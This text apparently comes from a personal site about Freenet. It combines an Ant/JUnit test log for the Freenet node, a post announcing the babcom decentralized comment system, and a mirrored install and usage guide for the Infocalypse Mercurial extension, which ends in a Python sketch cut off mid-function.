    [junit] Testcase: testByteArrayDecompress took 0,469 sec
    [junit] Testcase: testCompressException took 0,07 sec
    [junit] Testcase: testDecompressException took 0,089 sec
    [junit] Testcase: testRandomByteArrayDecompress took 14,453 sec
    [junit] Running freenet.support.io.ArrayBucketTest
    [junit] Testsuite: freenet.support.io.ArrayBucketTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,713 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,713 sec
    [junit] 
    [junit] Testcase: testReadExcess took 0,036 sec
    [junit] Testcase: testReuse took 0,05 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,134 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Running freenet.support.io.ByteArrayRandomAccessBufferTest
    [junit] Testsuite: freenet.support.io.ByteArrayRandomAccessBufferTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,936 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,936 sec
    [junit] 
    [junit] Testcase: testArray took 7,385 sec
    [junit] Testcase: testClose took 0,003 sec
    [junit] Testcase: testSize took 0,003 sec
    [junit] Testcase: testFormula took 0,949 sec
    [junit] Testcase: testWriteOverLimit took 0,061 sec
    [junit] Running freenet.support.io.HeaderStreamsTest
    [junit] Testsuite: freenet.support.io.HeaderStreamsTest
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] 
    [junit] Testcase: testAugInputSkipAndRead0 took 0,031 sec
    [junit] Testcase: testAugInputSkipAndReadI took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadM took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadP took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadZ took 0,001 sec
    [junit] Testcase: testAugInputRead0 took 0,001 sec
    [junit] Testcase: testAugInputRead1 took 0,001 sec
    [junit] Testcase: testAugInputReadI took 0,001 sec
    [junit] Testcase: testAugInputReadM took 0,001 sec
    [junit] Testcase: testAugInputReadP took 0 sec
    [junit] Testcase: testAugInputReadZ took 0,001 sec
    [junit] Testcase: testDimOutputThrow0 took 0,01 sec
    [junit] Testcase: testDimOutputThrow1 took 0 sec
    [junit] Testcase: testDimOutputWrite0 took 0,001 sec
    [junit] Testcase: testDimOutputWrite1 took 0,001 sec
    [junit] Testcase: testDimOutputWriteI took 0 sec
    [junit] Testcase: testDimOutputWriteM took 0,001 sec
    [junit] Testcase: testDimOutputWriteP took 0,001 sec
    [junit] Testcase: testDimOutputWriteZ took 0 sec
    [junit] Running freenet.support.io.LineReadingInputStreamTest
    [junit] Testsuite: freenet.support.io.LineReadingInputStreamTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] 
    [junit] Testcase: testReadLineWithoutMarking took 0,107 sec
    [junit] Testcase: testBothImplementation took 0,001 sec
    [junit] Testcase: testReadLine took 0,002 sec
    [junit] Running freenet.support.io.PaddedEphemerallyEncryptedBucketTest
    [junit] Testsuite: freenet.support.io.PaddedEphemerallyEncryptedBucketTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12306789ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12366182ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,353 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,353 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12306789ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12366182ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testReadExcess took 8,164 sec
    [junit] Testcase: testReuse took 0,03 sec
    [junit] Testcase: testReadEmpty took 0,02 sec
    [junit] Testcase: testReadWrite took 0,008 sec
    [junit] Testcase: testLargeData took 1,625 sec
    [junit] Testcase: testNegative took 0,021 sec
    [junit] Running freenet.support.io.PooledFileRandomAccessBufferTest
    [junit] Testsuite: freenet.support.io.PooledFileRandomAccessBufferTest
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test6259209596810098373.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test33305219255342692.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test1003474985387376899.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test7751124920479986023.tmp
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,314 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,314 sec
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test6259209596810098373.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test33305219255342692.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test1003474985387376899.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test7751124920479986023.tmp
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testLock took 0,254 sec
    [junit] Testcase: testSimplePooling took 0,355 sec
    [junit] Testcase: testLockedNotClosableFromNotOpenFD took 0,006 sec
    [junit] Testcase: testLockedNotClosable took 0,004 sec
    [junit] Testcase: testLockBlocking took 0,12 sec
    [junit] Testcase: testLocksB took 0,005 sec
    [junit] Testcase: testArray took 7,335 sec
    [junit] Testcase: testClose took 0,076 sec
    [junit] Testcase: testSize took 0,098 sec
    [junit] Testcase: testFormula took 0,927 sec
    [junit] Testcase: testWriteOverLimit took 0,642 sec
    [junit] Running freenet.support.io.RandomAccessFileWrapperTest
    [junit] Testsuite: freenet.support.io.RandomAccessFileWrapperTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,092 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,092 sec
    [junit] 
    [junit] Testcase: testStoreTo took 0,387 sec
    [junit] Testcase: testArray took 7,213 sec
    [junit] Testcase: testClose took 0,008 sec
    [junit] Testcase: testSize took 0,009 sec
    [junit] Testcase: testFormula took 0,841 sec
    [junit] Testcase: testWriteOverLimit took 0,142 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketFactoryRAFEncryptedTest
    [junit] Testsuite: freenet.support.io.TempBucketFactoryRAFEncryptedTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 23,547 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 23,547 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBucketToRAFFreeBucketWhileArray took 0,275 sec
    [junit] Testcase: testBucketToRAFWhileArray took 0,542 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileMigrateFirst took 1,146 sec
    [junit] Testcase: testBucketToRAFCallTwiceFile took 0,134 sec
    [junit] Testcase: testArrayMigration took 0,414 sec
    [junit] Testcase: testBucketToRAFCallTwiceArray took 0,008 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileFreeRAF took 0,017 sec
    [junit] Testcase: testBucketToRAFFailure took 0,035 sec
    [junit] Testcase: testBucketToRAFFreeWhileFile took 0,008 sec
    [junit] Testcase: testBucketToRAFWhileFile took 1,017 sec
    [junit] Testcase: testBucketToRAFFreeWhileArray took 0,014 sec
    [junit] Testcase: testArray took 15,439 sec
    [junit] Testcase: testClose took 0,188 sec
    [junit] Testcase: testSize took 0,233 sec
    [junit] Testcase: testFormula took 1,887 sec
    [junit] Testcase: testWriteOverLimit took 1,668 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketFactoryRAFPlaintextTest
    [junit] Testsuite: freenet.support.io.TempBucketFactoryRAFPlaintextTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,158 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,158 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBucketToRAFFreeBucketWhileArray took 0,232 sec
    [junit] Testcase: testBucketToRAFWhileArray took 0,355 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileMigrateFirst took 0,066 sec
    [junit] Testcase: testBucketToRAFCallTwiceFile took 0,008 sec
    [junit] Testcase: testArrayMigration took 0,231 sec
    [junit] Testcase: testBucketToRAFCallTwiceArray took 0,009 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileFreeRAF took 0,008 sec
    [junit] Testcase: testBucketToRAFFailure took 0,017 sec
    [junit] Testcase: testBucketToRAFFreeWhileFile took 0,005 sec
    [junit] Testcase: testBucketToRAFWhileFile took 0,07 sec
    [junit] Testcase: testBucketToRAFFreeWhileArray took 0,004 sec
    [junit] Testcase: testArray took 6,389 sec
    [junit] Testcase: testClose took 0,028 sec
    [junit] Testcase: testSize took 0,028 sec
    [junit] Testcase: testFormula took 0,953 sec
    [junit] Testcase: testWriteOverLimit took 0,297 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketTest$TempBucketMigrationTest
    [junit] Testsuite: freenet.support.io.TempBucketTest$TempBucketMigrationTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,863 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,863 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRamLimitCreate took 1,367 sec
    [junit] Testcase: testWriteExcessLimit took 0,016 sec
    [junit] Testcase: testWriteExcessConversionFactor took 0,005 sec
    [junit] Testcase: testBigConversionWhileReading took 0,022 sec
    [junit] Testcase: testConversionWhileReading took 0,002 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketTest
    [junit] Testsuite: freenet.support.io.TempBucketTest
    [junit] Tests run: 35, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,656 sec
    [junit] Tests run: 35, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,656 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testReadExcess took 0,036 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,019 sec
    [junit] Testcase: testLargeData took 0,188 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0 sec
    [junit] Testcase: testReuse took 0,001 sec
    [junit] Testcase: testReadEmpty took 0 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,018 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,035 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 1,652 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0,001 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,155 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Testcase: testRamLimitCreate took 0,006 sec
    [junit] Testcase: testWriteExcessLimit took 0,002 sec
    [junit] Testcase: testWriteExcessConversionFactor took 0,003 sec
    [junit] Testcase: testBigConversionWhileReading took 0,01 sec
    [junit] Testcase: testConversionWhileReading took 0,002 sec
    [junit] Running freenet.support.io.TempFileBucketTest
    [junit] Testsuite: freenet.support.io.TempFileBucketTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,812 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,812 sec
    [junit] 
    [junit] Testcase: testReadExcess took 0,164 sec
    [junit] Testcase: testReuse took 0,022 sec
    [junit] Testcase: testReadEmpty took 0,003 sec
    [junit] Testcase: testReadWrite took 0,004 sec
    [junit] Testcase: testLargeData took 0,132 sec
    [junit] Testcase: testNegative took 0,003 sec
    [junit] Running freenet.support.math.MersenneTwisterTest
    [junit] Testsuite: freenet.support.math.MersenneTwisterTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testConsistencySeedFromInteger took 0,094 sec
    [junit] Testcase: testConsistencySeedFromInts took 0,006 sec
    [junit] Testcase: testConsistencySeedFromLong took 0,005 sec
    [junit] Testcase: testConsistencySeedFromBytes took 0,07 sec
    [junit] Testcase: testBytesToInts took 0,001 sec
    [junit] Running net.i2p.util.NativeBigIntegerTest
    [junit] Testsuite: net.i2p.util.NativeBigIntegerTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi2156358229084298660lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,367 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,367 sec
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testModPow took 2,344 sec
    [junit] Testcase: testDoubleValue took 3,541 sec

package-only:
      [jar] Building jar: /home/arne/fred-work/dist/freenet.jar

package:

BUILD SUCCESSFUL
Total time: 27 minutes 19 seconds

(colorized with antlog-mode, a quickly whipped up emacs mode for highlighting and navigating the output from ant)

I now have a spam-resistant, decentralized comment system via Freenet

Note (2017): Due to changes in cross-origin requests, babcom is currently broken. I want to fix it, but can’t do it right now. Sorry for that.

Over the last years, spam got worse and worse. The more my site grew, the more time I had to spend deleting blatant advertisements. Even captchas did not help anymore: Either they were so hard that I myself needed 3 tries on average to get through, or I got hundreds of spam messages per day. A few years ago, I caved in and disabled comments. The alternative would have been to turn my website into a mere PR outlet of Facebook, Twitter, or one of the commenting platforms out there.

But this all changed now. I finally have decentralized, spam-resistant comments using babcom with Freenet as backend!

» babcom: decentralized, spam-resistant comments! «

The comment system builds on the decentralized, spam-resistant social features of the Freenet Project, one of the old cypherpunk creations: started in 2000 with the goal of providing true Freedom of the Press on the Internet, it has been evolving ever since. It is ironic that nowadays spam has become a vehicle to push people into censorship-enabling platforms, to use up their limited free time, or to drown their words in a pile of dung so other people cannot find them.

If you do not run Freenet right now, this screenshot shows how the comment system looks for me:

Babcom Screenshot

And for me this is a huge relief: I can finally get comments on my articles again without having to sell my conscience or waste most of my time deleting advertisements.

If that sounds interesting, head over to babcom and check if it suits you!

And if you like it, please Flattr babcom and Flattr Sone!

Infocalypse - Make your code survive the information apocalypse

Anonymous DVCS in the Darknet.

Real Life Infocalypse
easy setup of infocalypse (script)
Freenet Development over Freenet

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

This is a mirror of the documentation of the infocalypse extension for Mercurial written by djk - published here with his permission. It is licensed solely under the GPLv2 or later. The text is long. For concise information, use the second Link above (Freenet Development over Freenet).

Introduction

The Infocalypse 2.0 hg extension is an extension for Mercurial that allows you to create, publish and maintain incrementally updateable repositories in Freenet.

Your code is then hosted decentrally and anonymously, making it just as censorship-resistant as all other content in Freenet.

It works better than the other DVCS currently available for Freenet.

Most of the information you will find in this document can also be found in the extension's online help. i.e.:

hg help infocalypse

HOWTO: Infocalypse 2.0 hg extension


updated: 20090927

Note: Contains Freenet only links

Table of Contents


Requirements

The extension has the following dependencies:

  • Freenet
    You can find more information on Freenet here:

    http://freenetproject.org/ [HTTP Link!]

  • Python
    I test on Python 2.5.4 and 2.6.1. Any 2.5.x or later version should work. Earlier versions may work.

    You probably won't have to worry about installing Python. It's included in the Windows binary Mercurial distributions and most *nix flavor OS's should have a reasonably up to date version of Python installed.

  • Mercurial
    You can find more information on Mercurial here:

    http://mercurial-scm.org/ [HTTP Link!]

    Version 1.0.2 won't work.

    I use version 1.2.1 (x86 Gentoo) on a daily basis. Later versions should work.

    I've smoke tested 1.1.2 (on Ubuntu Jaunty Jackalope) and 1.3 (on Windows XP) without finding any problems.

  • FMS
    Installation of the Freenet Messaging System (FMS) is optional but
    highly recommended. The hg fn-fmsread and hg fn-fmsnotify commands won't work without FMS. Without fn-fmsread it is extremely difficult to reliably detect repository updates.

    The official FMS freesite is here:

    USK@0npnMrqZNKRCRoGojZV93UNHCMN-6UU3rRSAmP6jNLE,~BG-edFtdCC1cSH4O3BWdeIYa8Sw5DfyrSV-TKdO5ec,AQACAAE/fms/106/
    
    

[TOC]


Installation

You checked the requirements and understand the risks, right?

Here are step-by-step instructions on how to install the extension.

  • Download the bootstrap hg bundle:
    CHK@S~kAIr~UlpPu7mHNTQV0VlpZk-f~z0a71f7DlyPS0Do,IB-B5Hd7WePtvQuzaUGrVrozN8ibCaZBw3bQr2FvP5Y,AAIC--8/infocalypse2_1723a8de6e7c.hg
        

    You'll get a Potentially Dangerous Content warning from fproxy because the mime type isn't set. Choose 'Click here to force your browser to download the file to disk.'.

    I'll refer to the directory that you saved the bundle file to as DOWNLOAD_DIR.

  • Create an empty directory where you want to install the extension.
    I'll refer to that directory as INSTALL_DIR in the
    rest of these instructions.

  • Create an empty hg repository there. i.e.:
    cd INSTALL_DIR
    hg init
    
  • Unbundle the bootstrap bundle into the new repository. i.e:
    hg pull DOWNLOAD_DIR/infocalypse2_1723a8de6e7c.hg
    hg update
    
  • Edit the '[extensions]' section of your .hgrc/mercurial.ini
    file to point to the infocalypse directory in the unbundled source.

    # .hgrc/mercurial.ini snippet
    [extensions]
    infocalypse = INSTALL_DIR/infocalypse
    

    where INSTALL_DIR is the directory you unbundled into.

    If you don't know where to find/create your .hgrc/mercurial.ini file, this link may be useful:

    http://www.selenic.com/mercurial/hgrc.5.html [HTTP Link!]

  • Run fn-setup to create the config file and temp dir. i.e.
    hg fn-setup
       

    If you run your Freenet node on another machine or on a non-standard port you'll need to use the --fcphost and/or --fcpport parameters to set the FCP host and port respectively.

    By default fn-setup will write the configuration file for the extension (.infocalypse on *nix, infocalypse.ini on Windows) into your home directory and also create a temp directory called infocalypse_tmp there.

    You can change the location of the temp directory by using the --tmpdir argument.

    If you want to put the config file in a different location set the cfg_file option in the [infocalypse] section of your .hgrc/mercurial.ini file before running fn-setup.

    Example .hgrc entry:
    # Snip, from .hgrc
    [infocalypse]
    cfg_file = /mnt/usbkey/s3kr1t/infocalypse.cfg
  • Edit the fms_id and possibly fms_host/fms_port information in the .infocalypse/infocalypse.ini file. i.e.:

    # Example .infocalypse snippet
    fms_id = YOUR_FMS_ID
    
    fms_host = 127.0.0.1
    fms_port = 1119
    

    where YOUR_FMS_ID is the part of your fms id before the '@' sign.

    If you run FMS with the default settings on the same machine you are running Mercurial on, you probably won't need to adjust the fms_host or fms_port.

    You can skip this step if you're not running fms.

  • Read the latest known version of the extension's repository USK index from FMS.
    hg fn-fmsread -v
    

    You can skip this step if you're not running fms.

  • Pull the latest changes to the extension from Freenet for the first time. Don't skip this step! i.e.:
    hg fn-pull --aggressive --debug --uri USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/41
    hg update
    

    You may have trouble finding the top key if you're not using fn-fmsread. Just keep retrying. If you know the index has increased, use the new index in the URI.

    After the first pull, you can update without the URI.

[TOC]


Updating

This extension is under active development. You should periodically update to get the latest bug fixes and new features.

Once you've installed the extension and pulled it for the first time, you can get updates by cd'ing into the initial INSTALL_DIR and typing:

hg fn-fmsread -v
hg fn-pull --aggressive
hg update

If you're not running FMS you can skip the fn-fmsread step. You may have trouble getting the top key. Just keep retrying.

If you're having trouble updating and you know the index has increased, use the full URI with the new index as above.

[TOC]


Background

Here's background information that's useful when using the extension. See the Infocalypse 2.0 hg extension page on my freesite for a more detailed description of how the extension works.

Repositories are collections of hg bundle files

An Infocalypse repository is just a collection of hg bundle files which have been inserted into Freenet as CHKs and some metadata describing how to pull the bundles to reconstruct the repository that they represent. When you 'push' to an infocalypse repository, a new bundle CHK is inserted with the changes since the last update. When you 'pull', only the CHKs for bundles for changesets not already in the local repository need to be fetched.

Repository USKs

The latest version of the repository's metadata is stored on a Freenet Updateable Subspace Key (USK) as a small binary file.

You'll notice that repository USKs end with a number without a trailing '/'. This is an important distinction. A repository USK is not a freesite. If you try to view one with fproxy you'll just get a 'Potentially Dangerous Content' warning. This is harmless and ugly, but unavoidable at the current time because of limitations in fproxy/FCP.

Repository top key redundancy

Repository USKs that end in *.R1/<number> are inserted redundantly, with a second USK insert done on *.R0/<number>. Top key redundancy makes it easier for other people to fetch your repository.

Inserting to a redundant repository USK makes the inserter more vulnerable to
correlation attacks. Don't use '.R1' USKs if you're worried about this.

Repository Hashes

Repository USKs can be long and cumbersome. A repository hash is the first 12 hex digits of the SHA1 hash of the zero-index version of a repository USK. e.g.:

SHA1( USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/0 )
  == 'be68e8feccdd'
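
For illustration, here is a minimal Python sketch of that computation. It assumes the hash is simply the SHA1 of the ASCII text of the zero-index USK; the authoritative implementation is the one in the extension's source:

# Illustrative sketch only, not the extension's actual code.
import hashlib

def repo_hash(usk):
    # Force the trailing edition number to 0, then hash the text of the USK.
    base, _, _ = usk.rpartition('/')
    zero_index_usk = base + '/0'
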